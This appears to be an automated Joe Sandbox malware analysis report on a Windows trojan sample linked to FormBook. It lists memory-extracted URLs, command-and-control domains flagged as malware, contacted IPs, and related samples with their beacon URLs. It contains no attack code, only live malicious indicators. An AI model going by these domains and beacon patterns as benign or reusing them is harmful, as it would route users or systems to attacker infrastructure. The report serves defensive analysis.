                                              https://alldomains.hosting/domain-registrieren.htmlexplorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.gritslab.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.thewildphotographer.co.ukexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shopexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.222ambking.org/u2kb/www.222ambking.orgexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.fclaimrewardccpointq.shop/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.327263504.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.name.com/domain/reneexplorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.energyservicestation.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icocmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                                    		high
                                                    http://www.employerseervices.com/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://alldomains.hosting/e-mail-server.htmlexplorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4ccmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.younrock.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HI4NJ046K.5.drfalse
                                                      		high
                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                                        		high
                                                        http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exefalse
                                                          		high
                                                          http://www.un-object.com/u2kb/www.un-object.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfrexplorer.exe, 00000004.00000002.580448726.0000000014C16000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000003E06000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.avisrezervee.com/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.mygloballojistik.online/u2kb/www.mygloballojistik.onlineexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                                            		high
                                                            http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://alldomains.hosting/explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fclaimrewardccpointq.shopexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://www.sedo.com/services/parking.php3cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=HI4NJ046K.5.drfalse
                                                                		high
                                                                https://search.yahoo.com?fr=crmas_sfpcmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                                                  		high
                                                                  http://www.ecomofietsen.com/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://alldomains.hosting/hosting-webhosting.htmlcmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.germanreps.com/u2kb/www.germanreps.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.germanreps.com/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.employerseervices.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.younrock.com/u2kb/www.younrock.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.222ambking.orgexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.shapshit.xyz/u2kb/www.shapshit.xyzexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.ecomofietsen.com/u2kb/www.ecomofietsen.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.un-object.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=HI4NJ046K.5.drfalse
                                                                    		high
                                                                    http://www.bitservicesltd.com/u2kb/www.bitservicesltd.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    85.187.128.34
                                                                    		thedivinerudraksha.comUnited States
                                                                    		55293A2HOSTINGUStrue
                                                                    91.195.240.94
                                                                    		www.222ambking.orgGermany
                                                                    		47846SEDO-ASDEtrue
                                                                    45.33.30.197
                                                                    		www.thewildphotographer.co.ukUnited States
                                                                    		63949LINODE-APLinodeLLCUStrue
                                                                    78.141.192.145
                                                                    		gritslab.comFrance
                                                                    		20473AS-CHOOPAUStrue
                                                                    161.97.163.8
                                                                    		www.bitservicesltd.comUnited States
                                                                    		51167CONTABODEtrue
                                                                    81.17.18.198
                                                                    		www.younrock.comSwitzerland
                                                                    		51852PLI-ASCHtrue
                                                                    192.185.17.12
                                                                    		un-object.comUnited States
                                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                                    94.176.104.86
                                                                    		white-hat.ukRomania
                                                                    		5588GTSCEGTSCentralEuropeAntelGermanyCZtrue
                                                                    213.145.228.111
                                                                    		www.energyservicestation.comAustria
                                                                    		25575DOMAINTECHNIKATtrue
                                                                    199.192.30.147
                                                                    		www.shapshit.xyzUnited States
                                                                    		22612NAMECHEAP-NETUStrue

                                                                    General Information

                                                                    Joe Sandbox Version:37.0.0 Beryl
                                                                    Analysis ID:830750
                                                                    Start date and time:2023-03-20 16:58:12 +01:00
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 12m 23s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:10
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample file name:SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@8/5@12/10
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HDC Information:
                                                                    • Successful, ratio: 80.6% (good quality ratio 73.9%)
                                                                    • Quality average: 74.7%
                                                                    • Quality standard deviation: 31.2%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 79
                                                                    • Number of non-executed functions: 75
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    17:00:00API Interceptor498x Sleep call for process: explorer.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    85.187.128.34DHL Shippment Details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      DHL Consignment Receipt_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        TNT Original Invoice_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          Original Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                            DHL Original Receipt_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              TNT Consigment Details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                DHL Original Invoice_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Sanbook Equip Machines Trading Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    TNT Consignment Detail_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      Consignment Details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        DHL delivery documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          Consignment Details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            91.195.240.94P.O._102176_GERGONNE_ECUADO.xlsGet hashmaliciousFormBookBrowse
                                                                                            • www.222ambking.org/u2kb/?yxT=IEUpLmGg2fqLmrhwDt0HH4Dmwnp8buQDFcodV2ACJcW4bHSQscR3Nc4uRx31p3m0gGv03uToPch8hD/UV0aNEuwUBkA/MZE81TYBR3w=&ztsv=vM0GwYzHHf7WmYm
                                                                                            JuqXstkIev.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.222ambking.org/u2kb/?GL=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQcAITX4MK5Qzrg==&3-=KF8OVZO2s5FvSqx
                                                                                            wcLqHBO764.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.222ambking.org/u2kb/?zs-k=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehEvYMWlgBNb0O8HA+I3fNPQC0&CwC8b=64iJ2Ncx
                                                                                            41-1909.xlsGet hashmaliciousFormBookBrowse
                                                                                            • www.222ambking.org/u2kb/?HH=IEUpLmGg2fqLmrhwDt0HH4Dmwnp8buQDFcodV2ACJcW4bHSQscR3Nc4uRx31p3m0gGv03uToPch8hD/UV0aNEuwUBkA/MZE81TYBR3w=&W_0-cS=Humw2Bbbw
                                                                                            PO-230803-S00.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.hclivestockllc.com/gpc9/?28=XrcXTyOAOYd9aU4&pfD=r4xkw9xDB1wo3slcdg6rUjRe7kFSdCXpDXTEI+YePT7ZCFxbPrZuYShaw7tfdW5HjmdcITubfaVAk+ZjQ6yH/BFwzAznHhNmhW0UHWj4Ob2v
                                                                                            Proof_Of_Payment_&_Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.hclivestockllc.com/gpc9/?Qw=r4xkw9xDB1wo3slcdg6rUjRe7kFSdCXpDXTEI+YePT7ZCFxbPrZuYShaw7tfdW5HjmdcITubfaVAk+ZjQ6yH/HJ92yb1HAFijG0UHW3TD72v&Cq=oXbgvbGl
                                                                                            UmB7W3DjYt.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.bocc.live/xprq/?iGm=tf4qEj9XfeOz&Ox=04GkhfUGfL517ZfrQTJCnTHUPvLrMt2DmbV9d0Avbh7jdE1gjdQdA6PtaN7kofoREWOk0byRFFpr+nfTIsSg95Q6O03fBL8zJA==
                                                                                            rasbp_altaa_saprbqbr.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.elders-children.exchange/de12/?CrHxJlF=KqCIRGu6i/M9iuwgHw8+Pu7yQHz+vayZCBsSaj6skFdtvQD1obqL3OktVqE/IUnwPs+q&q6A=6lBHG4oHj0B4Wt
                                                                                            M.V._TRITEX_GLORY.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.bocc.live/xprq/?QYONluAS=04GkhfUGfL517ZfrRjl9gTbWLvWULs2DmbV9d0Avbh7jdE1gjdQdA6TtaN7kofoREWOk0byRFFpr+nfTIsSj94k7Px7kBL4aOQ==&y7Ie=zYTQw
                                                                                            ENG-A02 STORES RQST SPI-23-ES-12A.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.bocc.live/xprq/?uvf=04GkhfUGfL517ZfrQTJCnTHUPvLrMt2DmbV9d0Avbh7jdE1gjdQdA6PtaN7kofoREWOk0byRFFpr+nfTIsSj47k7O0HhC4RBYSrCWht46e3H&SKM4=9lRv1vNR-Ro7
                                                                                            rpayment.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.bocc.live/vg57/?XtCa4=zaTBPYAStXYCrL6d5TbS9p+WpuKqS57nsNjnMuTwTKdiWdpKrzlVFSWwJv5QCPouDcnNdLk9SLPG4LgA3XXBD2UqTIV/mXqeHQ==&3Ye=K4M0ihfmD-3
                                                                                            z1Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.222ambking.org/ik4t/?a4XZg=xSep+aVokQy3L5Kwqh9FxrYA/a8Ufun9m15qpfvYxFGq+xVpPfbJ+O/19tCIEBG7sI0kXRkhVjzUUQxa1wcmcpa4r7E/qQAZ5A==&OsSIN=8o3y2VncPJur74
                                                                                            Overdue Invoices.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.222ambking.org/ifkh/?tfOj=Q0MM4DFj6Z2ivGFSm0hVEtJu1BYjf2K0DtQbJH5h634HF0G4fdK3c5UlrE/yvwDY07yUaq/2Ixj37cXOTq6Q1n2SHxr5iDhRJg==&QBwd=ySpEpMci
                                                                                            INQUIRY.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.222ambking.org/ifkh/?gr1cx=Q0MM4DFj6Z2ivGFSm0hVEtJu1BYjf2K0DtQbJH5h634HF0G4fdK3c5UlrE/yvwDY07yUaq/2Ixj37cXOTq6Q1n2SHxr5iDhRJg==&WP=swm4NUz
                                                                                            E-DEKONT#22022023.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.cbdsoulmindbody.com/gg84/?5j5T=UKMDchTTNNEzbRtXEqNsmpGqmve4H/PmVS6zAMSKOEZxFuCLWmh9g/fhRCN+lmnB3JRI&4hLplB=l8vPy41
                                                                                            YIqZ253T62.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.222ambking.org/ik4t/?DQ=xSep+aVokQy3L5Kwqh9FxrYA/a8Ufun9m15qpfvYxFGq+xVpPfbJ+O/19tCIEBG7sI0kXRkhVjzUUQxa1wcmcpa4r7E/qQAZ5A==&tf=UqhDJB_qkFeWgI
                                                                                            DISCHG.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.222ambking.org/ifkh/?KcaPyHx=Q0MM4DFj6Z2ivGFSm0hVEtJu1BYjf2K0DtQbJH5h634HF0G4fdK3c5UlrE/yvwDY07yUaq/2Ixj37cXOTq6Q1n2SHxr5iDhRJg==&wPZ=LagcBXAYd4eOQY30
                                                                                            DISCHG.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.222ambking.org/ifkh/?YpJdNd=Q0MM4DFj6Z2ivGFSnA5cFs5oiRcDICW0DtQbJH5h634HF0G4fdK3c5YlrE/yvwDY07yUaq/2Ixj37cXOTq6Q7HCgJij4mgQQHQ==&C9=mZXZVrrY
                                                                                            ALORA-23-038.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.bocc.live/xprq/?9IfA=04GkhfUGfL517ZfrQTJCnTHUPvLrMt2DmbV9d0Avbh7jdE1gjdQdA6PtaN7kofoREWOk0byRFFpr+nfTIsSg97QdK13fCKE7JA==&PPC=Z_Pw
                                                                                            LZR-VAT. VATIKA - LZR-VAT-001 2023e-I003.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.bocc.live/xprq/?5M54J=ySvy3_dUnw_&vMAB-=04GkhfUGfL517ZfrQTJCnTHUPvLrMt2DmbV9d0Avbh7jdE1gjdQdA6PtaN7kofoREWOk0byRFFpr+nfTIsSj47k7O0HhC4RBYSrCWht46e3H

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            www.energyservicestation.comP.O._102176_GERGONNE_ECUADO.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 213.145.228.111
                                                                                            JuqXstkIev.exeGet hashmaliciousFormBookBrowse
                                                                                            • 213.145.228.111
                                                                                            wcLqHBO764.exeGet hashmaliciousFormBookBrowse
                                                                                            • 213.145.228.111
                                                                                            41-1909.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 213.145.228.111
                                                                                            www.bitservicesltd.comd0#U10dc.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 161.97.163.8
                                                                                            P.O._102176_GERGONNE_ECUADO.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 161.97.163.8
                                                                                            JuqXstkIev.exeGet hashmaliciousFormBookBrowse
                                                                                            • 161.97.163.8
                                                                                            wcLqHBO764.exeGet hashmaliciousFormBookBrowse
                                                                                            • 161.97.163.8
                                                                                            41-1909.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 161.97.163.8
                                                                                            www.younrock.comJuqXstkIev.exeGet hashmaliciousFormBookBrowse
                                                                                            • 192.187.111.219
                                                                                            wcLqHBO764.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.17.18.197
                                                                                            41-1909.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 81.17.18.197
                                                                                            www.thewildphotographer.co.ukJuqXstkIev.exeGet hashmaliciousFormBookBrowse
                                                                                            • 45.33.23.183
                                                                                            wcLqHBO764.exeGet hashmaliciousFormBookBrowse
                                                                                            • 45.56.79.23
                                                                                            41-1909.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 45.56.79.23

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            A2HOSTINGUSLATEST_RATE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 70.32.23.72
                                                                                            PAYMENT_SLIP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 70.32.23.72
                                                                                            EzbB.jsGet hashmaliciousUnknownBrowse
                                                                                            • 68.66.228.50
                                                                                            EzbB.jsGet hashmaliciousUnknownBrowse
                                                                                            • 68.66.228.50
                                                                                            MZykmSpz4e.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 66.198.252.105
                                                                                            Scope_of_work.exeGet hashmaliciousFormBookBrowse
                                                                                            • 70.32.23.105
                                                                                            FileViewPro_2013.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.218.14.54
                                                                                            RFI_NO._2_-_PROVISION_OF_EPCIC_FOR_KCD_ORF.exeGet hashmaliciousFormBookBrowse
                                                                                            • 70.32.23.105
                                                                                            php.iniGet hashmaliciousUnknownBrowse
                                                                                            • 68.66.248.36
                                                                                            Excel Statement001.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 185.146.23.90
                                                                                            Excel Statement001.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 185.146.23.90
                                                                                            o0G3mAJ7Ud.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 66.198.252.105
                                                                                            URGENT_REQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 70.32.23.72
                                                                                            Excel Statement001.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 185.146.23.90
                                                                                            Excel Statement001.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 185.146.23.90
                                                                                            Excel Statement001.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 185.146.23.90
                                                                                            Excel Statement001.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 185.146.23.90
                                                                                            URGENT_REQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 70.32.23.72
                                                                                            F6_VLAP_MTO_SSB-F6VLAP-PI-MT.exeGet hashmaliciousFormBookBrowse
                                                                                            • 70.32.23.105
                                                                                            SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 70.32.23.72
                                                                                            SEDO-ASDEP.O._102176_GERGONNE_ECUADO.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            JuqXstkIev.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            wcLqHBO764.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            41-1909.xlsGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            TNT_Invoice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.117
                                                                                            dhl_shipping_papers.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.117
                                                                                            r5573XLX_Confirming_685738_Permiso.vbsGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.117
                                                                                            PO-230803-S00.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            HSBC Payment Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.117
                                                                                            Gea_Order.vbsGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.117
                                                                                            php.iniGet hashmaliciousUnknownBrowse
                                                                                            • 91.195.240.82
                                                                                            Proof_Of_Payment_&_Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            UmB7W3DjYt.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbsGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.117
                                                                                            rasbp_altaa_saprbqbr.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            M.V._TRITEX_GLORY.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            rekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 91.195.241.232
                                                                                            Q233473 Michelin.vbsGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.117
                                                                                            ENG-A02 STORES RQST SPI-23-ES-12A.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.94
                                                                                            hsbc payment slip.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.117

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Temp\HI4NJ046K

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):94208
                                                                                            Entropy (8bit):1.2880737026424216
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                                            File Type:data
